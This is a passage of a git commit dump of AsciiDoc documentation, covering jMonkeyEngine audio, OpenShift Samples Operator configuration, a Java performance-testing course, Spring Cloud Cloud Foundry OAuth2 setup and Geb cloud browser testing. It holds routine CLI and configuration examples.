AudioNodes can be attached directly to the root node or they can be attached inside a node that is moving through the scene and both the AudioNode and the 3d position of the sound it is generating will move accordingly.\n\n*Tip:* playInstance always plays the sound from the position of the AudioNode so multiple gunshots from one gun (for example) can be generated this way, however if multiple guns are firing at once then an AudioNode is needed for each one.\n\n\n== Triggering Sound\n\nLet's have a closer look at `initKeys()`: As you learned in previous tutorials, you use the `inputManager` to respond to user input. Here you add a mapping for a left mouse button click, and name this new action `Shoot`.\n\n[source,java]\n----\n\n \/** Declaring \"Shoot\" action, mapping it to a trigger (mouse left click). 
*\/\n private void initKeys() {\n inputManager.addMapping(\"Shoot\", new MouseButtonTrigger(MouseInput.BUTTON_LEFT));\n inputManager.addListener(actionListener, \"Shoot\");\n }\n\n----\n\nSetting up the ActionListener should also be familiar from previous tutorials. You declare that, when the trigger (the mouse button) is pressed and released, you want to play a gun sound.\n\n[source,java]\n----\n\n \/** Defining the \"Shoot\" action: Play a gun sound. *\/\n private ActionListener actionListener = new ActionListener() {\n @Override\n public void onAction(String name, boolean keyPressed, float tpf) {\n if (name.equals(\"Shoot\") && !keyPressed) {\n audio_gun.playInstance(); \/\/ play each instance once!\n }\n }\n };\n----\n\nSince you want to be able to shoot fast repeatedly, you do not want to wait for the previous gunshot sound to end before the next one can start. This is why you play this sound using the `playInstance()` method. This means that every click starts a new instance of the sound, so two instances can overlap. You set this sound not to loop, so each instance only plays once, as you would expect of a gunshot.\n\n\n== Ambient or Situational?\n\nThe two sounds are two different use cases:\n\n* A gunshot is situational. You want to play it only once, right when it is triggered.\n** This is why you `setLooping(false)`.\n\n* The nature sound is an ambient, background noise. You want it to start playing from the start, as long as the game runs.\n** This is why you `setLooping(true)`.\n\n\nNow every sound knows whether it should loop or not. \n\nApart from the looping boolean, another difference is where `play()` or `playInstance()` is called on those nodes:\n\n* You start playing the background nature sound right after you have created it, in the initAudio() method.\n[source,java]\n----\n audio_nature.play(); \/\/ play continuously!\n\n----\n\n* The gunshot sound, however, is triggered situationally, once, only as part of the `Shoot` input action that you defined in the ActionListener.\n[source,java]\n----\n\n \/** Defining the \"Shoot\" action: Play a gun sound. *\/\n private ActionListener actionListener = new ActionListener() {\n @Override\n public void onAction(String name, boolean keyPressed, float tpf) {\n if (name.equals(\"Shoot\") && !keyPressed) {\n audio_gun.playInstance(); \/\/ play each instance once!\n }\n }\n };\n----\n\n\n\n== Buffered or Streaming?\n\nAs of 3.1-alpha2, the Enum in the AudioNode constructor defines whether the audio is buffered or streamed. For example:\n\n[source,java]\n----\naudio_gunshot = new AudioNode(assetManager, \"Sound\/Effects\/Gun.wav\", DataType.Buffer); \/\/ buffered\n...\naudio_nature = new AudioNode(assetManager, \"Sound\/Environment\/Nature.ogg\", DataType.Stream); \/\/ streamed \n----\n\nTypically, you stream long sounds, and buffer short sounds.\n\n+++<strike>Note that streamed sounds can not loop (i.e. setLooping will not work as you expect). Check the getStatus on the node and if it has stopped recreate the node.<\/strike>+++ (As of 3.1-alpha2, this is no longer true.)\nIf you still run 3.0, the above is still the case, and a simple boolean is used instead of `DataType`.\n\n\n== Play() or PlayInstance()?\n[cols=\"2\", options=\"header\"]\n|===\n\na|audio.play()\na|audio.playInstance()\n\na|Plays buffered sounds.\na|Plays buffered sounds. 
\n\na|Plays streamed sounds.\na|Cannot play streamed sounds.\n\na|The same sound cannot play twice at the same time.\na|The same sounds can play multiple times and overlap.\n\n|===\n\n\n== Your Ear in the Scene\n\nTo create a 3D audio effect, JME3 needs to know the position of the sound source, and the position of the ears of the player. The ears are represented by a 3D Audio Listener object. The `listener` object is a default object in a SimpleApplication.\n\nIn order to make the most of the 3D audio effect, you must use the `simpleUpdate()` method to move and rotate the listener (the player's ears) together with the camera (the player's eyes).\n\n[source,java]\n----\n\n public void simpleUpdate(float tpf) {\n listener.setLocation(cam.getLocation());\n listener.setRotation(cam.getRotation());\n }\n\n----\n\nIf you don't do that, the results of 3D audio will be quite random.\n\n\n== Global, Directional, Positional?\n\nIn this example, you defined the nature sound as coming from a certain position, but not the gunshot sound. This means your gunshot is global and can be heard everywhere with the same volume. JME3 also supports directional sounds which you can only hear from a certain direction. \n\nIt makes equal sense to make the gunshot positional, and let the ambient sound come from every direction. How do you decide which type of 3D sound to use from case to case?\n\n* In a game with moving enemies you may want to make the gunshot or footsteps positional sounds. In these cases you must move the AudioNode to the location of the enemy before `playInstance()`ing it. This way a player with stereo speakers hears from which direction the enemy is coming.\n* Similarly, you may have game levels where you want one background sound to play globally. In this case, you would make the AudioNode neither positional nor directional (set both to false).\n* If you want sound to be \u201cabsorbed\u201d by the walls and only broadcast in one direction, you would make this AudioNode directional. This tutorial does not discuss directional sounds; you can read about them in <<jme3\/advanced\/audio#,Advanced Audio>>.\n\nIn short, you must choose in every situation whether it makes sense for a sound to be global, directional, or positional.\n\n\n== Conclusion\n\nYou now know how to add the two most common types of sound to your game: Global sounds and positional sounds. You can play sounds in two ways: Either continuously in a loop, or situationally just once. You know the difference between buffering short sounds and streaming long sounds. You know the difference between playing overlapping sound instances, and playing unique sounds that cannot overlap with themselves. You also learned to use sound files that are in either .ogg or .wav format.\n\n*Tip:* JME's Audio implementation also supports more advanced effects such as reverberation and the Doppler effect. Use these \u201cpro\u201d features to make audio sound different depending on whether it's in the hallway, in a cave, outdoors, or in a carpeted room. Find out more about environmental effects from the sample code included in the jme3test directory and from the advanced <<jme3\/advanced\/audio#,Audio>> docs.\n\nWant some fire and explosions to go with your sounds? 
Read on to learn more about <<jme3\/beginner\/hello_effects#,effects>>.\n\n'''\n\nSee also:\n\n* <<jme3\/advanced\/audio#,Audio>>\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"75de0da4f0a0e038f58c03a8f73e8301913827ef","subject":"Bug 1764353 Remove namespace and other minor updates","message":"Bug 1764353 Remove namespace and other minor updates\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/samples-operator-crd.adoc","new_file":"modules\/samples-operator-crd.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * openshift_images\/configuring_samples_operator.adoc\n\n\n[id=\"samples-operator-crd{context}\"]\n= Accessing the Samples Operator configuration\n\nYou can configure the Samples Operator by editing the file with the provided\nparameters.\n\n.Prerequisites\n\n* Install the OpenShift Command-line Interface (CLI), commonly known as `oc`.\n\n.Procedure\n\n* Access the Samples Operator configuration:\n+\n----\n$ oc get configs.samples.operator.openshift.io\/cluster -o yaml\n----\n+\nThe Samples Operator configuration resembles the following example:\n+\n[source,yaml]\n----\napiVersion: samples.operator.openshift.io\/v1\nkind: Config\nprojectName: cluster-samples-operator\n...\n----\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * openshift_images\/configuring_samples_operator.adoc\n\n\n[id=\"samples-operator-crd{context}\"]\n= Accessing the Samples Operator file\n\nYou can configure the Samples Operator by editing the file with the provided\nparameters.\n\n.Procedure\n\n* Access the Samples Operator file:\n+\n----\n# oc get configs.samples.operator.openshift.io -n openshift-cluster-samples-operator\n----\n+\nThe following is an example of the Samples Operator file:\n+\n[source,yaml]\n----\napiVersion: samples.operator.openshift.io\/v1\nkind: SamplesResource\nprojectName: cluster-samples-operator\n...\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"46a9c78c318e5412678d055d70bacb8c0679ad94","subject":"fix(process): fix link in TOC","message":"fix(process): fix link in TOC\n","repos":"arnauldvm\/jpt-course","old_file":"src\/main\/adoc\/4-process\/0-perf_test_process.adoc","new_file":"src\/main\/adoc\/4-process\/0-perf_test_process.adoc","new_contents":"\/\/ build_options: \nJava Performance Tuning - Performance Testing Process\n=====================================================\nArnauld Van Muysewinkel <avm@pendragon.be>\nv0.1, 28-Oct-2015: Initial version\n:backend: slidy\n\/\/:theme: volnitsky\n:data-uri:\n:copyright: Creative-Commons-Zero (Arnauld Van Muysewinkel)\n:icons:\n\n\nContent\n-------\n\n* <<_rtri_documentation,Documentation>>\n* <<_rtri_iteration,Iteration>>\n* <<_rtri_process_smals,Process for SIC@Smals>>\n** Steps\n\/\/ (p16)\n\/\/** Plan\n\/\/ (p18,19),\n** Mission Sheet\n\n_(link:..\/0-extra\/1-training_plan.html#_presentations[back to course plan])_\n\n\n▹ Documentation\n--------------------\n\n* Architecture document of the UoT\n* Test plan:\n** goals\n** scope (boundaries of the UoT)\n** resources required (! including key people for running the test or for solving issues)\n** scheduling\n* Requirements: performance goals\n* Test data: input data for the test scenario (! 
quantity and randomization)\n* Test protocol: process, scenarios, load profiles...\n* Test report:\n** all results (measures and calculations)\n** conclusions\n\n\n▹ Iteration\n----------------\n\n[WARNING]\n=====\n* Fix > *one* < issue at a time! +\nNot doing so exposes you to major problems.\n* Iterate only if it's worth the price +\n(i.e. does the client want to pay for the next performance improvement?)\n=====\n\n\n▹ Process @ Smals\n----------------------\n\n* [Project] Prepare Mission Sheet (V1)\n* Send V1 to SIC -> schedule KOM\n* [Project+SIC] KOM\n** Agree on the high level design of the test protocol (scenarios, load profiles...)\n* LOOP\n** [Project] Complete Mission Sheet (V2)\n*** Final artifacts\n*** Complete set of input data\n*** Complete set of users (attributes...)\n** [SIC] Detailed test protocol\n*** [Project] Support\n** [SIC] Prepare test environment\n*** [Project] Support\n*** [Middleware] Support\n** [SIC] Prepare test harness (jmeter scripts, SOAP clients, jenkins configuration...)\n*** [Project] Support\n** [SIC] Run test\n** [SIC] Analyse results\n** [SIC+Project] discuss results\n** ITERATE\n* [SIC] Prepare report\n** [Project] Review report\n* [SIC] Publish report\n\n\nMission Sheet\n-------------\n\nSee template in https:\/\/github.com\/arnauldvm\/jpt-course\/tree\/master\/data\/docs[data\/docs] in git repo\n\n\nProtocol\n--------\n\nSee legacy reference protocol in https:\/\/github.com\/arnauldvm\/jpt-course\/tree\/master\/data\/docs[data\/docs] in git repo\n\n\nThat's all folks!\n-----------------\n\n[cols=\"^\",grid=\"none\",frame=\"none\"]\n|=====\n|image:..\/thats-all-folks.png[link=\"#(1)\"]\n|=====\n","old_contents":"\/\/ build_options: \nJava Performance Tuning - Performance Testing Process\n=====================================================\nArnauld Van Muysewinkel <avm@pendragon.be>\nv0.1, 28-Oct-2015: Initial version\n:backend: slidy\n\/\/:theme: volnitsky\n:data-uri:\n:copyright: Creative-Commons-Zero (Arnauld Van Muysewinkel)\n:icons:\n\n\nContent\n-------\n\n* <<_rtri_documentation,Documentation>>\n* <<_rtri_process,Process>>\n* <<_rtri_process_smals,Process for SIC@Smals>>\n** Steps\n\/\/ (p16)\n\/\/** Plan\n\/\/ (p18,19),\n** Mission Sheet\n\n_(link:..\/0-extra\/1-training_plan.html#_presentations[back to course plan])_\n\n\n▹ Documentation\n--------------------\n\n* Architecture document of the UoT\n* Test plan:\n** goals\n** scope (boundaries of the UoT)\n** resources required (! including key people for running the test or for solving issues)\n** schedulling\n* Requirements: performance goals\n* Test data: input data for the test scenario (! quantity and randomization)\n* Test protocol: process, scenarios, load profiles...\n* Test report:\n** all results (measures and calculations)\n** conclusions\n\n\n▹ Iteration\n----------------\n\n[WARNING]\n=====\n* Fix > *one* < issue at a time! +\nNot doing so exposes you to major problems.\n* Iterate only if it's worth the price +\n(i.e. 
does the client want to pay for the next performance improvement?)\n=====\n\n\n▹ Process @ Smals\n----------------------\n\n* [Project] Prepare Mission Sheet (V1)\n* Send V1 to SIC -> schedule KOM\n* [Project+SIC] KOM\n** Agree on the high level design of the test protocol (scenarios, load profiles...)\n* LOOP\n** [Project] Complete Mission Sheet (V2)\n*** Final artifacts\n*** Complete set of input data\n*** Complete set of users (attributes...)\n** [SIC] Detailed test protocol\n*** [Project] Support\n** [SIC] Prepare test environment\n*** [Project] Support\n*** [Middleware] Support\n** [SIC] Prepare test harness (jmeter scripts, SOAP clients, jenkins configuration...)\n*** [Project] Support\n** [SIC] Run test\n** [SIC] Analyse results\n** [SIC+Project] discuss results\n** ITERATE\n* [SIC] Prepare report\n** [Project] Review report\n* [SIC] Publish report\n\n\nMission Sheet\n-------------\n\nSee template in https:\/\/github.com\/arnauldvm\/jpt-course\/tree\/master\/data\/docs[data\/docs] in git repo\n\n\nProtocol\n--------\n\nSee legacy reference protocol in https:\/\/github.com\/arnauldvm\/jpt-course\/tree\/master\/data\/docs[data\/docs] in git repo\n\n\nThat's all folks!\n-----------------\n\n[cols=\"^\",grid=\"none\",frame=\"none\"]\n|=====\n|image:..\/thats-all-folks.png[link=\"#(1)\"]\n|=====\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"30bc45c5a84c6fc6c47fbbb26d3a1dd2f771f412","subject":"Fix asciidoc","message":"Fix asciidoc\n","repos":"jadekler\/spring-cloud-cloudfoundry,jadekler\/spring-cloud-cloudfoundry,spring-cloud\/spring-cloud-cloudfoundry,spring-cloud\/spring-cloud-cloudfoundry,jadekler\/spring-cloud-cloudfoundry","old_file":"src\/main\/asciidoc\/spring-cloud-cloudfoundry.adoc","new_file":"src\/main\/asciidoc\/spring-cloud-cloudfoundry.adoc","new_contents":"= Spring Cloud for Cloud Foundry\n\ninclude::intro.adoc[]\n\n== Quickstart\n\ninclude::quickstart.adoc[]\n\n== How Does it Work?\n\n=== OAuth2 Single Sign On\n\nSpring Cloud Security provides the `@EnableOAuth2Sso` annotation and\nbinds the app to environment properties in `oauth2.\\*`. Spring Cloud\nfor Cloud Foundry just sets up default environment properties so that\nit all just works if you bind to a Cloud Foundry service instance\ncalled \"sso\". The service credentials are mapped to the SSO\nproperties, i.e. (from `oauth2.client.*`) `clientId`, `clientSecret`,\n`tokenUri`, `authorizationUri`, (and from `oauth2.resource.*`)\n`userInfoUri`, `tokenInfoUri`, `keyValue`, `keyUri`. Refer to the\nSpring Cloud Security documentation for details of which combinations\nwill work together. The main thing is that in Cloud Foundry you only\nneed one service to cover all the necessary credentials.\n\nTo use a different service instance name (i.e. not \"sso\") just set\n`oauth2.sso.serviceId` to your custom name.\n\n=== JWT Tokens\n\nSpring Cloud Security already has support for decoding JWT tokens if\nyou just provide the verification key (as an environment property). 
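Outside Cloud Foundry you could, for example, set it directly (a\nhypothetical `application.properties` sketch, using the `keyUri` key from\nthe `oauth2.resource.*` properties listed above):\n\n----\noauth2.resource.keyUri=https:\/\/uaa.run.pivotal.io\/token_key\n----\n\n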
In\nCloud Foundry you can pick that property up from a service binding\n(`keyValue` or `keyUri`).\n\nFor example, the `keyUri` in PWS is\n\"https:\/\/uaa.run.pivotal.io\/token_key\":\n\n----\n$ curl https:\/\/uaa.run.pivotal.io\/token_key\n{\"alg\":\"SHA256withRSA\",\"value\":\"-----BEGIN PUBLIC KEY-----\\nMIIBI...\\n-----END PUBLIC KEY-----\\n\"}\n----\n\n=== OAuth2 Resource Server\n\nSimilarly, the `@EnableOAuth2Resource` annotation will protect your\nAPI endpoints if you bind to a service instance called \"resource\".\nThe \"sso\" service above will work for a resource server as well (so\njust bind to that if it's there). If the OAuth2 tokens are JWTs (as in\nCloud Foundry), it is common to use a separate service for resources\nto avoid a network round trip decoding the token on every access. A\nuser-provided-service for an OAuth2 resource can be created like this\non PWS:\n\n----\n$ cf create-user-provided-service resource -p '{keyUri:\"https:\/\/uaa.run.pivotal.io\/token_key\"}'\n----\n\nTo use JWT you need to add the verification key as either\n`keyValue` or `keyUri` (these could be added to the \"sso\"\nservice or the \"resource\" service if you have one).\n\nTo use a different service instance name (i.e. not \"resource\" or\n\"sso\") just set `oauth2.resource.serviceId` to your custom name.\n\n=== Default Environment Keys\n\nThe precise mappings are as follows:\n\n* `oauth2.sso.\\*` to `vcap.services.${oauth2.sso.serviceId:sso}.credentials.*`\n\n* `oauth2.client.\\*` to `vcap.services.${oauth2.sso.serviceId:sso}.credentials.tokenUri:${vcap.services.${oauth2.resource.serviceId:resource}.credentials.*`\n\n* `oauth2.resource.(jwt).\\*` to `vcap.services.${oauth2.resource.serviceId:resource}.credentials.tokenUri:${vcap.services.${oauth2.sso.serviceId:sso}.credentials.*`\n\n\n","old_contents":"= Spring Cloud for Cloud Foundry\n\ninclude::intro.adoc[]\n\n== Quickstart\n\ninclude::quickstart.adoc[]\n\n== How Does it Work?\n\n=== OAuth2 Single Sign On\n\nSpring Cloud Security provides the `@EnableOAuth2Sso` annotation and\nbinds the app to environment properties in `oauth2.\\*`. Spring Cloud\nfor Cloud Foundry just sets up default environment properties so that\nit all just works if you bind to a Cloud Foundry service instance\ncalled \"sso\". The service credentials are mapped to the SSO\nproperties, i.e. (from `oauth2.client.\\*`) `clientId`, `clientSecret`,\n`tokenUri`, `authorizationUri`, (and from `oauth2.resource.\\*`)\n`userInfoUri`, `tokenInfoUri`, `keyValue`, `keyUri`. Refer to the\nSpring Cloud Security documentation for details of which combinations\nwill work together. The main thing is that in Cloud Foundry you only\nneed one service to cover all the necessary credentials.\n\nTo use a different sercice instance name (i.e. not \"sso\") just set\n`oauth2.sso.serviceId` to your custom name.\n\n=== JWT Tokens\n\nSpring Cloud Security already has support for decoding JWT tokens if\nyou just provide the verification key (as an environment property). 
In\nCloud Foundry you can pick that property up from a servcice binding\n(`keyValue` or `keyUri`).\n\nFor example the `keyUri` in PWS is\n\"https:\/\/uaa.run.pivotal.io\/token_key\":\n\n----\n$ curl https:\/\/uaa.run.pivotal.io\/token_key\n{\"alg\":\"SHA256withRSA\",\"value\":\"-----BEGIN PUBLIC KEY-----\\nMIIBI...\\n-----END PUBLIC KEY-----\\n\"}d\n----\n\n=== OAuth2 Resource Server\n\nSimilarly, the `@EnableOAuth2Resource` annotation will protect your\nAPI endpoints if you bind to a service instance called \"resource\".\nThe \"sso\" service above will work for a resource server as well (so\njust bind to that if it's there). If the OAuth2 tokens are JWTs (as in\nCloud Foundry), it is common to use a separate service for resources\nto avoid a network round trip decoding the token on every access. A\nuser-provided-service for an OAuth2 resource can be created like this\non PWS:\n\n----\n$ cf create-user-provided-service resource -p '{keyUri:\"https:\/\/uaa.run.pivotal.io\/token_key\"}\n----\n\nTo use JWT you need to add the verification key as either\n`keyValue` or `keyUri` (these could be added to the \"sso\"\nservice or the \"resource\" service if you have one).\n\nTo use a different sercice instance name (i.e. not \"resource\" or\n\"sso\") just set `oauth2.resource.serviceId` to your custom name.\n\n=== Default Environment Keys\n\nThe precise mapppings are as follows:\n\n* `oauth2.sso.\\*` to `vcap.services.${oauth2.sso.serviceId:sso}.credentials.*`\n\n* `oauth2.client.\\*` to `vcap.services.${oauth2.sso.serviceId:sso}.credentials.tokenUri:${vcap.services.${oauth2.resource.serviceId:resource}.credentials.*`\n\n* `oauth2.resource.(jwt).\\*` to `vcap.services.${oauth2.resource.serviceId:resource}.credentials.tokenUri:${vcap.services.${oauth2.sso.serviceId:sso}.credentials.*`\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"af0888077a0f72d47b273af7f3f8b66c497e9502","subject":"Add a snippet to the manual showing how to specify proxy settings for BrowserStack tunnel.","message":"Add a snippet to the manual showing how to specify proxy settings for BrowserStack tunnel.\n","repos":"ntotomanov-taulia\/geb,geb\/geb,ntotomanov-taulia\/geb,geb\/geb","old_file":"doc\/manual\/src\/docs\/asciidoc\/111-cloud-browsers.adoc","new_file":"doc\/manual\/src\/docs\/asciidoc\/111-cloud-browsers.adoc","new_contents":"= Cloud browser testing\n\nWhen you want to perform web testing on multiple browsers and operating systems, it can be quite complicated to maintain machines for each of the target environments.\nThere are a few companies that provide \"remote web browsers as a service\", making it easy to do this sort of matrix testing without having to maintain the multiple browser installations yourself.\nGeb provides easy integration with two such services, link:https:\/\/saucelabs.com\/[SauceLabs] and link:http:\/\/www.browserstack.com\/[BrowserStack].\nThis integration includes two parts: assistance with creating a driver in `GebConfig.groovy` and a Gradle plugin.\n\n== Creating a driver\n\nFor both SauceLabs and BrowserStack, a special driver factory is provided that, given a browser specification as well as a username and access key, creates an instance of `RemoteWebDriver` configured\nto use a browser in the cloud.\nExamples of typical usage in `GebConfig.groovy` are included below.\nThey will configure Geb to run in SauceLabs\/BrowserStack if the appropriate system property is set, and if not it will use whatever driver is configured.\nThis is useful if you want 
to run the code in a local browser for development.\nIn theory you could use any system property to pass the browser specification but `geb.saucelabs.browser`\/`geb.browserstack.browser` are also used by the Geb Gradle plugins, so it's a good idea to\nstick with those property names.\n\nThe first parameter passed to the `create()` method is a \u201dbrowser specification\u201c and it should be a list of required browser capabilities in Java properties file format:\n\n----\nbrowserName=\u00abbrowser name as per values of fields in org.openqa.selenium.remote.BrowserType\u00bb\nplatform=\u00abplatform as per enum item names in org.openqa.selenium.Platform\u00bb\nversion=\u00abversion\u00bb\n----\n\nAssuming you're using the following snippet in your `GebConfig.groovy` to execute your code via SauceLabs with Firefox 19 on Linux, you would set the `geb.saucelabs.browser` system property to:\n\n----\nbrowserName=firefox\nplatform=LINUX\nversion=19\n----\n\nand to execute it with IE 9 on Vista to:\n\n----\nbrowserName=internet explorer\nplatform=VISTA\nversion=9\n----\n\nSome browsers like Chrome automatically update to the latest version; for these browsers you don't need to specify the version as there's only one, and you would use something like:\n\n----\nbrowserName=chrome\nplatform=MAC\n----\n\nas the \u201dbrowser specification\u201c. For a full list of available browsers, versions and operating systems refer to your cloud provider's documentation:\n\n* link:https:\/\/saucelabs.com\/docs\/platforms\/webdriver[SauceLabs platform list]\n* link:http:\/\/www.browserstack.com\/list-of-browsers-and-platforms?product=automate[BrowserStack Browsers and Platforms list]\n\nPlease note that Geb Gradle plugins can set the `geb.saucelabs.browser`\/`geb.browserstack.browser` system properties for you using the aforementioned format.\n\nFollowing the browser specification are the username and access key used to identify your account with the cloud provider.\nThe example uses two environment variables to access this information.\nThis is usually the easiest way of passing something secret to your build in open CI services like link:https:\/\/drone.io\/[drone.io] or link:https:\/\/travis-ci.org\/[Travis CI] if your code is public, but you can\nuse other mechanisms if desired.\n\nYou can optionally pass additional configuration settings by providing a Map to the `create()` method as the last parameter.\nThe configuration options available are described in your cloud provider's documentation:\n\n* link:https:\/\/saucelabs.com\/docs\/additional-config[SauceLabs additional config]\n* link:http:\/\/www.browserstack.com\/automate\/capabilities[BrowserStack Capabilities]\n\nFinally, there is also link:api\/geb\/driver\/CloudDriverFactory.html#create(java.lang.String,%20java.lang.String,%20Map%3CString,%20Object%3E)[an overloaded version of `create()` method] available that\ndoesn't take a string specification and allows you to simply specify all the required capabilities using a map.\nThis method might be useful if you just want to use the factory, but don't need the build level parametrization.\n\n[[sauce-labs-driver-factory]]\n=== `SauceLabsDriverFactory`\n\nThe following is an example of utilizing `SauceLabsDriverFactory` in `GebConfig.groovy` to configure a driver that will use a browser provided in the SauceLabs cloud.\n\n[source,groovy]\n----\ndef sauceLabsBrowser = System.getProperty(\"geb.saucelabs.browser\")\nif (sauceLabsBrowser) {\n driver = {\n def username = System.getenv(\"GEB_SAUCE_LABS_USER\")\n 
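\/\/ fail fast if the account credentials are missing from the environment\n 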
assert username\n def accessKey = System.getenv(\"GEB_SAUCE_LABS_ACCESS_PASSWORD\")\n assert accessKey\n new SauceLabsDriverFactory().create(sauceLabsBrowser, username, accessKey)\n }\n}\n----\n\n[[browser-stack-driver-factory]]\n=== `BrowserStackDriverFactory`\n\nThe following is an example of utilizing `BrowserStackDriverFactory` in `GebConfig.groovy` to configure a driver that will use a browser provided in the BrowserStack cloud.\n\n[source,groovy]\n----\ndef browserStackBrowser = System.getProperty(\"geb.browserstack.browser\")\nif (browserStackBrowser) {\n driver = {\n def username = System.getenv(\"GEB_BROWSERSTACK_USERNAME\")\n assert username\n def accessKey = System.getenv(\"GEB_BROWSERSTACK_AUTHKEY\")\n assert accessKey\n new BrowserStackDriverFactory().create(browserStackBrowser, username, accessKey)\n }\n}\n----\n\nIf using `localIdentifier` support:\n\n[source,groovy]\n----\ndef browserStackBrowser = System.getProperty(\"geb.browserstack.browser\")\nif (browserStackBrowser) {\n driver = {\n def username = System.getenv(\"GEB_BROWSERSTACK_USERNAME\")\n assert username\n def accessKey = System.getenv(\"GEB_BROWSERSTACK_AUTHKEY\")\n assert accessKey\n def localId = System.getenv(\"GEB_BROWSERSTACK_LOCALID\")\n assert localId\n new BrowserStackDriverFactory().create(browserStackBrowser, username, accessKey, localId)\n }\n}\n----\n\n== Gradle plugins\n\nFor both SauceLabs and BrowserStack, Geb provides a Gradle plugin which simplifies declaring the account and browsers that are desired, as well as configuring a tunnel to allow the cloud provider to\naccess local applications.\nThese plugins allow easily creating multiple `Test` tasks that will have the appropriate `geb.PROVIDER.browser` property set (where _PROVIDER_ is either `saucelabs` or `browserstack`).\nThe value of that property can be then passed in configuration file to <<sauce-labs-driver-factory>>\/<<browser-stack-driver-factory>> as the \u201dbrowser specification\u201c.\nExamples of typical usage are included below.\n\n=== geb-saucelabs plugin\n\nFollowing is an example of using the geb-saucelabs Gradle plugin.\n\n[source,groovy,subs=\"attributes,verbatim\"]\n----\nimport geb.gradle.saucelabs.SauceAccount\n\napply plugin: \"geb-saucelabs\" \/\/<1>\n\nbuildscript { \/\/<2>\n repositories {\n mavenCentral()\n }\n dependencies {\n classpath 'org.gebish:geb-gradle:{geb-version}'\n }\n}\n\nrepositories { \/\/<3>\n maven { url \"http:\/\/repository-saucelabs.forge.cloudbees.com\/release\" }\n}\n\ndependencies { \/\/<4>\n sauceConnect \"com.saucelabs:ci-sauce:1.81\"\n}\n\nsauceLabs {\n browsers { \/\/<5>\n firefox_linux_19\n chrome_mac\n delegate.\"internet explorer_vista_9\"\n nexus4 { \/\/<6>\n capabilities(\n browserName: \"android\",\n platform: \"Linux\",\n version: \"4.4\",\n deviceName: \"LG Nexus 4\"\n )\n }\n }\n task { \/\/<7>\n testClassesDir = test.testClassesDir\n testSrcDirs = test.testSrcDirs\n classpath = test.classpath\n }\n account { \/\/<8>\n username = System.getenv(SauceAccount.USER_ENV_VAR)\n accessKey = System.getenv(SauceAccount.ACCESS_KEY_ENV_VAR)\n }\n connect { \/\/<9>\n port = 4444 \/\/<10>\n additionalOptions = ['--proxy', 'proxy.example.com:8080'] \/\/<11>\n }\n}\n----\n<1> Apply the plugin to the build.\n<2> Specify how to resolve the plugin.\n<3> Declare a repository for resolving SauceConnect.\n<4> Declare version of SauceConnect to be used as part of the `sauceConnect` configuration. 
This will be used by tasks that open a {sauce-connect} tunnel before\nrunning the generated test tasks which means that the browsers in the cloud will have localhost pointing at the machine running the build.\n<5> Declare that tests should run in 3 different browsers using the shorthand syntax; this will generate the following `Test` tasks: `firefoxLinux19Test`, `chromeMacTest` and\n`internet explorerVista9Test`.\n<6> Explicitly specify the required browser capabilities if the shorthand syntax doesn't allow you to express all needed capabilities; the example will generate a `Test` task named `nexus4Test`.\n<7> Configure all of the generated test tasks; for each of them the closure is run with delegate set to a test task being configured.\n<8> Pass credentials for {sauce-connect}.\n<9> Additionally configure {sauce-connect} if desired.\n<10> Override the port used by SauceConnect, defaults to 4445.\n<11> Pass additional link:https:\/\/docs.saucelabs.com\/reference\/sauce-connect\/#command-line-options[command line options] to SauceConnect.\n\n[TIP]\n====\nYou can use `allSauceLabsTests` task that will depend on all of the generated test tasks to run all of them during a build.\n====\n\n=== geb-browserstack plugin\n\nFollowing is an example of using the geb-browserstack Gradle plugin.\n\n[source,groovy,subs=\"attributes,verbatim\"]\n----\nimport geb.gradle.browserstack.BrowserStackAccount\n\napply plugin: \"geb-browserstack\" \/\/<1>\n\nbuildscript { \/\/<2>\n repositories {\n mavenCentral()\n }\n dependencies {\n classpath 'org.gebish:geb-gradle:{geb-version}'\n }\n}\n\nbrowserStack {\n application 'http:\/\/localhost:8080' \/\/<3>\n forceLocal = true \/\/<4>\n browsers { \/\/<5>\n firefox_mac_19\n chrome_mac\n delegate.\"internet explorer_windows_9\"\n nexus4 { \/\/<6>\n capabilities browserName: \"android\", platform: \"ANDROID\", device: \"Google Nexus 4\"\n }\n }\n task { \/\/<7>\n testClassesDir = test.testClassesDir\n testSrcDirs = test.testSrcDirs\n classpath = test.classpath\n }\n account { \/\/<8>\n username = System.getenv(BrowserStackAccount.USER_ENV_VAR)\n accessKey = System.getenv(BrowserStackAccount.ACCESS_KEY_ENV_VAR)\n }\n}\n----\n<1> Apply the plugin to the build.\n<2> Specify how to resolve the plugin.\n<3> Specify which urls the BrowserStack Tunnel should be able to access.\nMultiple applications can be specified.\nIf no applications are specified, the tunnel will not be restricted to particular URLs.\n<4> Configure BrowserStack tunnel to route all traffic via the local machine.\nThis configuration property controls the `-forcelocal` flag and the default value for it is `false`.\n<5> Declare that tests should run in 3 different browsers using the shorthand syntax; this will generate the following `Test` tasks: `firefoxMac19Test`, `chromeMacTest` and\n`internet explorerWindows9Test`.\n<6> Explicitly specify the required browser capabilities if the shorthand syntax doesn't allow you to express all needed capabilities; the example will generate a `Test` task named `nexus4Test`.\n<7> Configure all of the generated test tasks; for each of them the closure is run with delegate set to a test task being configured.\n<8> Pass credentials for BrowserStack.\n\nIt's also possible to specify location and credentials for the proxy to be used with the BrowserStack Tunnel:\n\n[source,groovy,subs=\"attributes,verbatim\"]\n----\nbrowserStack {\n account {\n proxyHost = '127.0.0.1'\n proxyPort = '8080'\n proxyUser = 'user'\n proxyPass = 'secret'\n }\n}\n----\n\n[TIP]\n====\nYou can use 
